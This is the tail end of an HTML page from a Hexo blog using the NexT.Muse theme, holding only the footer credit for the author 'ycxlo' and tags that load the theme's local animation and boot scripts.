  </span>
  <span class="author" itemprop="copyrightHolder">ycxlo</span>
</div>
  <div class="powered-by">Powered by <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://muse.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Muse</a>
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/muse.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

</body>
</html>
